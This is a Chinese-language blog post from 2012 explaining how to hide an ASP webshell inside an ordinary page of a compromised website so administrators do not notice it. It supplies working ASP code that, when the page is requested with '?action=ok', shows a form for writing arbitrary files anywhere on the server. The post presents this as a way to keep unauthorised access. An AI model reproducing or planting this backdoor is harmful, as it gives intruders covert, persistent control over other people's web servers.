隐蔽的插入型ASP木马

得到网站的webshell后,如果被管理员发现,那么你的马就没用了 ,被删了!   管理员都也不都是混饭吃的,所以我们要隐藏好我们的 WEBSHELL, 下面是关于ASP插入型 木马 几种利用方法 不容易被发现~~~呵呵 我拿个webshell给大家做演示: 好,我们随便找一个 要做手脚的ASP文件 1.在我们要做手脚的ASP文件里加入如下内容 <% if request(action)=ok then %& gt; ################################## <% end if %> 在######################### 处加入你的shell代码 代码我已经提供了 如newmm.asp 木马 (建议加密代码):大家很熟悉吧,我以前的教程做过分析 了 <% if request(action)=ok then %> <%dim objFSO%> & lt;%dim fdata%> <%dim objCountFile%> <%on error resume next%> <%Set objFSO = Server.CreateObject(Scripting.FileSystemObject)%& gt; <%if Trim(request(syfdpath))<> then%> <%fdata = request(cyfddata)%& gt; <%Set objCountFile=objFSO.CreateTextFile(request(syfdpath),True)%& gt; <%objCountFile.Write fdata%> <%if err =0 then%> & lt;%response.write <font color=red>save Success!</font>%& gt; <%else%> <%response.write <font color=red> Save UnSuccess!</font>%> <%end if%> <%err.clear%> <%end if%> <%objCountFile.Close%> <%Set objCountFile=Nothing%& gt; <%Set objFSO = Nothing%> <%Response.write < form action= method=post>%> <%Response.write 保存文件的< font color=red>绝对路径(包括文件名:如D:\web\x.asp):</font>%> & lt;%Response.Write <input type=text name=syfdpath width=32 size=50& gt;%> <%Response.Write <br>%> <%Response.write 本文件绝对路 径%> <%=server.mappath(Request.ServerVariables(SCRIPT_NAME))%> & lt;%Response.write <br>%> <%Response.write 输入的内 容:%> <%Response.write <textarea name=cyfddata cols=80 rows=10 width=32& gt;</textarea>%> <%Response.write <input type=submit value= 保存>%> <%Response.write </form>%> <% end if%> 加入以 后不影响正常浏揽 访问的时候在你做了手脚的ASP文件后面加上?action=ok(例如:index.asp?action=ok) 就可以调出 shell了,不影响正常浏揽 大家看到了吧,呵呵
posted @ 2012-07-15 21:56  adodo1  Views(191)  Comments(0Edit  收藏  举报